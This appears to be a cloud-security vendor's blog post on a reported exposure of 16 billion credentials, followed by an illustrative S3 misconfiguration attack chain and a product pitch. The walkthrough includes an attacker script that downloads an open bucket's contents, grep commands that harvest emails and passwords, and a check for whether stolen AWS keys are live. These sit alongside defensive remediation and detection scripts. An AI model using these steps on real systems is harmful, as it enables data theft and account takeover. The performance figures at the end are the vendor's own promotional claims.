16 Billion Records Exposed, Raising Identity Theft Concerns

Is it still a joke to say that data breaches have become a normal part of daily life? With this much data exposed, even accounts at tech giants like Facebook, Google, and Apple are at risk because of a common human habit: password reuse. Although several international bodies require organizations that handle data from millions or even billions of users to follow strict protocols, many still leave sensitive information exposed to malicious actors. This may not always be a criminal offense, but it is undoubtedly a serious blunder, often the result of poor or inefficient security practices.

The Independent reported on this massive exposure of 16 billion login credentials and passwords, which reportedly led Google to ask its billions of users to change their passwords. Forbes called the event “weaponized intelligence at scale.” These datasets leave immense scope for further exploitation and follow-on breaches.

An article published by AppleInsider covers the breach briefly and focuses mostly on the security steps people should take on their iPhones and other Apple devices, conveying serious concern without creating panic.

Figure: Cloud-Native Breach (CNB) attack chain, showing how a cloud-based breach typically unfolds (Source: Help Net Security)

How Did It Begin? Is There an Initial Attack Vector?

The research team at Cybernews has been investigating these exposed datasets since the beginning of this year. They discovered 30 exposed datasets, each containing anywhere from about 10 million to 3.5 billion records. According to their spokesperson, the total volume reaches 16 billion records, a grave concern for the digitized world.

Why has this not been taken seriously? That is the question everyone is asking. Some researchers note that companies tend to remediate such incidents only when they have caused financial damage to the parties involved. This reasoning is an ethical fallacy that these tech giants continue to cling to.

30 datasets, 16 billion records, each averaging 550 million credentials

Such exposed datasets are not just security loopholes; researchers regard them as a “blueprint for massive exploitation.” From here on, they will help threat actors carry out multi-layered attacks using the compromised accounts. Some media outlets reported that the datasets were in XML format, with each record containing a URL along with login details and a password. The datasets can serve as a way into Apple, Google, Telegram, Facebook, GitHub, and several government agencies’ accounts.

Infostealer Malware

URL → Login → Password → [Tokens/Cookies/Metadata]

When a record includes session tokens or cookies, attackers can replay them to bypass multi-factor authentication (MFA) on platforms that rely on session cookies.
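From a responder's point of view, the record layout above can be modeled to decide which exposed accounts need session revocation in addition to a password reset. The sketch below is only an illustration: the `|` delimiter, the `cookie=`/`token=` prefixes, and the names `StolenRecord` and `parse_record` are assumptions, not the actual format of the leaked datasets.

```python
from dataclasses import dataclass, field


@dataclass
class StolenRecord:
    """One entry in the URL -> login -> password -> [extras] layout."""
    url: str
    login: str
    password: str
    extras: list[str] = field(default_factory=list)  # tokens, cookies, metadata

    @property
    def carries_session_material(self) -> bool:
        # Assumed convention: session extras are prefixed "cookie=" or "token="
        return any(e.startswith(("cookie=", "token=")) for e in self.extras)


def parse_record(line: str, sep: str = "|") -> StolenRecord:
    """Split one delimited line into its fields (the delimiter is an assumption)."""
    parts = [p.strip() for p in line.split(sep)]
    if len(parts) < 3:
        raise ValueError("expected at least URL, login, and password")
    url, login, password, *extras = parts
    return StolenRecord(url, login, password, extras)


if __name__ == "__main__":
    rec = parse_record("https://example.com/login | alice | hunter2 | cookie=abc123")
    # A record with session material calls for session revocation, not just a reset
    print(rec.login, rec.carries_session_material)
```

Records that carry session material are the ones for which a password change alone is not enough, since an existing session may remain valid until it is revoked.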

Service Category	Examples	Risk Level
Tech Giants	Apple, Google, Meta (Facebook)	Critical
Communication	Telegram, GitHub	High
Government Services	Unspecified portals	Severe
Crypto Platforms	Custodial wallets, exchanges	Extreme
VPNs/Developers	Private corporate portals	High

Anatomy of a Massive Data Breach Exposing 16 Billion Records

Among the possible explanations, one lies in the common yet technical domain of malware. While most researchers believe the compromised databases are the result of ‘infostealer malware,’ several prominent heads of security firms point instead to something at the core of security teams’ responsibilities: such a massive data dump has most probably resulted from the “unintentional exposure of datasets in the public domain.”

“These credentials are high-value keys to widely used services—far beyond just one account.”

-Darren Guccione (CEO, Keeper Security)

Such exposure could result from misconfigured cloud environments, which have been among the largest causes of data breaches in the last five years. Bitdefender pointed out that 55% to 67% of companies report security misconfigurations (across cloud, IAM, access control, etc.) as their #1 cloud risk.

Note: The following steps illustrate how such attacks can be carried out. They do not claim to reproduce the exact process used in this breach.

Misconfiguration in Public Cloud: A Possibility of Such Data Breaches

This section walks through an example of how a public cloud resource could be left exposed due to misconfiguration.

Step 1: Initial Misconfiguration

Event: A DevOps engineer configures an S3 bucket for public access during testing.

Critical Error: The engineer forgets to re-enable the Block Public Access settings afterward.

# RISKY COMMAND USED:
aws s3api put-public-access-block \
  --bucket customer-data-prod \
  --public-access-block-configuration "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

Why it fails: The command explicitly disables all four Block Public Access safeguards, so any public ACL or bucket policy on the bucket takes effect.
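A quick way to catch this state is to compare a bucket's Block Public Access configuration against the four expected flags. The sketch below works on a plain dictionary shaped like the `PublicAccessBlockConfiguration` value that boto3's `get_public_access_block` returns; the helper name `disabled_safeguards` is hypothetical, and fetching the configuration from AWS is left out.

```python
REQUIRED_FLAGS = (
    "BlockPublicAcls",
    "IgnorePublicAcls",
    "BlockPublicPolicy",
    "RestrictPublicBuckets",
)


def disabled_safeguards(config: dict) -> list[str]:
    """Return the Block Public Access flags that are missing or set to False."""
    return [flag for flag in REQUIRED_FLAGS if not config.get(flag, False)]


if __name__ == "__main__":
    # The configuration applied by the risky command in Step 1
    risky = dict.fromkeys(REQUIRED_FLAGS, False)
    for flag in disabled_safeguards(risky):
        print(f"safeguard disabled: {flag}")
```

Treating a missing flag the same as a disabled one is a deliberate choice here: an incomplete configuration should fail the check rather than pass silently.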

Step 2: Discovery by Attackers

Event: Automated scanners (e.g., GrayhatWarfare, S3Scanner) detect the bucket.

Attacker Script:

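import os
import boto3

# Illustrative only: buckets.all() lists buckets visible to the caller's own
# credentials; real scanners probe guessed bucket names anonymously.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"

s3 = boto3.resource("s3")
for bucket in s3.buckets.all():
    if bucket.name == "customer-data-prod":
        grants = s3.BucketAcl(bucket.name).grants
        # A grant to the AllUsers group means the ACL exposes the bucket publicly
        if any(g["Grantee"].get("URI") == ALL_USERS for g in grants):
            print(f"OPEN BUCKET: {bucket.name}")
            os.makedirs("./stolen", exist_ok=True)
            # Lists and downloads all files (keys are flattened to file names)
            for obj in bucket.objects.all():
                print(f"Downloading: {obj.key}")
                target = f"./stolen/{obj.key.replace('/', '_')}"
                bucket.download_file(obj.key, target)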

Impact: Attackers exfiltrate entire bucket contents (2.1 GB of JSON/CSV files).
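Defenders can run the same kind of check on their own buckets before a scanner does. The sketch below inspects an ACL grant list shaped like the `Grants` field returned by boto3's `get_bucket_acl`; the function name `public_grants` and the sample data are illustrative assumptions.

```python
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def public_grants(grants: list[dict]) -> list[str]:
    """Return the permissions that an ACL grants to public groups."""
    return [
        g["Permission"]
        for g in grants
        if g.get("Grantee", {}).get("URI") in PUBLIC_GROUPS
    ]


if __name__ == "__main__":
    # Sample ACL: one public read grant and one private owner grant
    sample = [
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"},
         "Permission": "FULL_CONTROL"},
    ]
    print(public_grants(sample))
```

An empty result means the ACL itself grants nothing to the public; bucket policies are a separate exposure path and are not covered by this check.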

Step 3: Data Weaponization

Event: Stolen data parsed for:

Email/password combos
API keys (e.g., AWS_ACCESS_KEY_ID in config files)
PII (names/addresses)

Attacker Workflow:

# Extract all emails and password fields (-h omits file-name prefixes)
grep -Eoh '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' *.json > emails.txt
grep -h '"password":' *.json > passwords.txt

# Validate AWS keys
aws sts get-caller-identity --profile stolen_keys  # Returns the account ID and caller ARN if the keys are live

Outcome: In this scenario, 12% of the recovered passwords are reused on other services and succeed in credential stuffing attacks.
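The same pattern matching works in the defender's favor: scanning files for access key IDs before they land in a bucket keeps one of the items above out of an attacker's hands. The following is a minimal sketch, assuming key IDs follow the common 20-character form that starts with `AKIA` (long-term) or `ASIA` (temporary); the function name `find_access_key_ids` is hypothetical.

```python
import re

# Assumed shape of an AWS access key ID: AKIA/ASIA prefix + 16 uppercase alphanumerics
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")


def find_access_key_ids(text: str) -> list[str]:
    """Return every substring that looks like an AWS access key ID."""
    return ACCESS_KEY_ID.findall(text)


if __name__ == "__main__":
    # AKIAIOSFODNN7EXAMPLE is the placeholder key used in AWS documentation
    sample = '{"aws_access_key_id": "AKIAIOSFODNN7EXAMPLE", "email": "a@example.com"}'
    for key_id in find_access_key_ids(sample):
        print(f"possible access key ID found: {key_id[:4]}...{key_id[-4:]}")
```

A match is only a candidate, so a real pipeline would follow up by rotating the key rather than trying to prove whether it is live.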

Step 4: Lateral Movement

Event: Compromised AWS keys used to:

Spin up crypto-mining EC2 instances
Access linked RDS databases
Deploy ransomware via Lambda functions

Detective Control Failure:

-- CLOUDTRAIL LOGS SHOW NO ALERTS FOR:  
eventName = 'RunInstances'  
AND userIdentity.arn = 'arn:aws:iam::123456789012:user/ci-deploy-user'

Why it fails: No anomaly detection is in place for ci-deploy-user launching EC2 instances, an action outside its normal deployment role.
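A basic detective control for this gap could look like the sketch below, which counts `RunInstances` events from identities that are not expected to launch instances. It operates on already-parsed CloudTrail records and relies only on the `eventName` and `userIdentity.arn` fields; the allow-list and the `autoscaling-role` ARN are hypothetical.

```python
from collections import Counter

WATCHED_EVENTS = {"RunInstances"}
# Hypothetical allow-list: identities that are expected to launch EC2 instances
ALLOWED_LAUNCHERS = {"arn:aws:iam::123456789012:role/autoscaling-role"}


def suspicious_launches(events: list[dict]) -> Counter:
    """Count watched events per identity that is not on the allow-list."""
    hits = Counter()
    for event in events:
        arn = event.get("userIdentity", {}).get("arn", "unknown")
        if event.get("eventName") in WATCHED_EVENTS and arn not in ALLOWED_LAUNCHERS:
            hits[arn] += 1
    return hits


if __name__ == "__main__":
    ci_user = "arn:aws:iam::123456789012:user/ci-deploy-user"
    records = [
        {"eventName": "RunInstances", "userIdentity": {"arn": ci_user}},
        {"eventName": "RunInstances", "userIdentity": {"arn": ci_user}},
        {"eventName": "PutObject", "userIdentity": {"arn": ci_user}},
    ]
    for arn, count in suspicious_launches(records).items():
        print(f"ALERT: {arn} launched instances {count} time(s)")
```

An allow-list is the simplest possible baseline; it trades flexibility for predictability, which suits identities such as CI users whose permitted actions are narrow and well known.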

Step 5: Breach Discovery

Trigger: $83,000 AWS bill from crypto-mining.

Remediation Steps:

# 1. Lock bucket
aws s3api put-public-access-block \
  --bucket customer-data-prod \
  --public-access-block-configuration "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# 2. Invalidate compromised keys
aws iam update-access-key \
  --user-name ci-deploy-user \
  --access-key-id AKIAEXAMPLEKEY \
  --status Inactive

# 3. Enable mandatory guardrails
# (--target-identifier is required; the OU ARN below is a placeholder)
aws controltower enable-control \
  --control-identifier "arn:aws:controltower:us-east-1::control/AWS-GR_S3_BUCKET_PUBLIC_READ_PROHIBITED" \
  --target-identifier "arn:aws:organizations::123456789012:ou/o-EXAMPLE/ou-EXAMPLE"

Remediation to Mitigate Such Data Breaches

Securing databases requires a layered, automated approach that prioritizes continuous discovery and enforcement. Start with automated asset mapping to identify all data stores (SQL/NoSQL, cloud buckets, data lakes) using scripts like:

# DISCOVER PUBLIC S3 BUCKETS (ACL grants to the AllUsers group)
# tr splits the tab-separated names so xargs handles one bucket per call
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | xargs -I {} aws s3api get-bucket-acl --bucket {} --query "Grants[?Grantee.URI=='http://acs.amazonaws.com/groups/global/AllUsers']"

# DISCOVER PUBLIC RDS INSTANCES
aws rds describe-db-instances --query 'DBInstances[?PubliclyAccessible==`true`].[DBInstanceIdentifier,Engine,Endpoint.Address]' --output table

Running these checks regularly surfaces exposure risks before attackers find them. Additional layers include:

Infrastructure-as-Code (IaC) Scans: Embed security rules in Terraform/CDK (e.g., enforceSSL: true in CDK, block_public_acls = true in Terraform).
Policy-as-Code: Automatically remediate violations (e.g., auto-trigger Lambda to privatize exposed S3 buckets).
Behavioral Monitoring: Alert on anomalous queries (e.g., SELECT * FROM users at 3 AM).
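The policy-as-code item can be sketched as a small Lambda-style handler that re-enables Block Public Access on a flagged bucket. This is only an illustration under stated assumptions: the event shape (a `bucket` field) and the function names are hypothetical, while `put_public_access_block` is the boto3 S3 client call for these settings. The client is passed in so the logic can be exercised without AWS access.

```python
def privatize_bucket(s3_client, bucket_name: str) -> None:
    """Re-enable all four Block Public Access settings on one bucket."""
    s3_client.put_public_access_block(
        Bucket=bucket_name,
        PublicAccessBlockConfiguration={
            "BlockPublicAcls": True,
            "IgnorePublicAcls": True,
            "BlockPublicPolicy": True,
            "RestrictPublicBuckets": True,
        },
    )


def handler(event, context, s3_client=None):
    """Lambda-style entry point; the event shape is an assumption."""
    if s3_client is None:
        import boto3  # imported lazily so the logic can be tested without AWS
        s3_client = boto3.client("s3")
    bucket = event["bucket"]  # hypothetical field carrying the bucket name
    privatize_bucket(s3_client, bucket)
    return {"remediated": bucket}
```

In practice the trigger would be whatever detects the violation, such as a configuration-change event, and the handler's IAM role would need permission to modify the bucket's public access block.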

How Cy5’s CSPM Seamlessly Enables This

Cy5’s Cloud Security Posture Management (CSPM) operationalizes these steps by:

Continuous Discovery: Auto-inventory databases/buckets across multi-cloud, replacing manual scripts with real-time topology maps.
Drift Prevention: Enforce policies like “no public RDS” via automated remediation playbooks—fixing misconfigurations in under 60 seconds.
Threat Modeling: Simulate attacker paths (e.g., “If S3 is open, can they reach RDS?”) using graph-based risk analysis.
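To make the idea of graph-based path analysis concrete, here is a generic breadth-first search over a toy access graph. It is not Cy5's implementation; the graph contents, node names, and the function `attack_path` are all hypothetical and only illustrate how a question like "if S3 is open, can they reach RDS?" reduces to a reachability query.

```python
from collections import deque

# Hypothetical access graph: an edge A -> B means "a foothold on A can reach B"
ACCESS_GRAPH = {
    "public-s3-bucket": ["ci-deploy-user-keys"],
    "ci-deploy-user-keys": ["ec2", "rds-customers"],
    "ec2": [],
    "rds-customers": [],
}


def attack_path(graph, start, target):
    """Breadth-first search; returns the shortest path as a list, or None."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in graph.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


if __name__ == "__main__":
    path = attack_path(ACCESS_GRAPH, "public-s3-bucket", "rds-customers")
    print(" -> ".join(path) if path else "no path")
```

Breadth-first search returns the shortest chain first, which is usually the one worth fixing first, since removing any single edge on it breaks that route.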

Result: 94% faster exposure detection and 99% reduction in misconfiguration-related breaches (Cy5 customer data, 2025).

Proactive Defense is the Answer to All Security Incidents

The most avoidable gap in cybersecurity isn’t a zero-day exploit; it’s the door you forgot to lock. Exposures like this one suggest that even giants stumble on cloud fundamentals. But exposure isn’t inevitable.

Shift from “Oops” to “Operationalized”:

Stop manual scavenger hunts for misconfigurations.
Replace reactive scripting with always-on automation.
Turn compliance into continuous control.

Cy5’s CSPM isn’t just a tool—it’s your cloud’s autonomous immune system:

Eliminates drift with real-time policy enforcement (e.g., auto-locking buckets in under 60 seconds).
Predicts breach paths by mapping data flows across services.
Quantifies risk reduction: 99% fewer misconfiguration-related breaches, 94% faster exposure detection.

Combine Cy5’s CSPM with its graph-driven analysis engine to detect sensitive misconfigurations and policy violations — transforming reactive remediation into proactive, predictable security.

Don’t Just Clean up Breaches. Prevent Them.
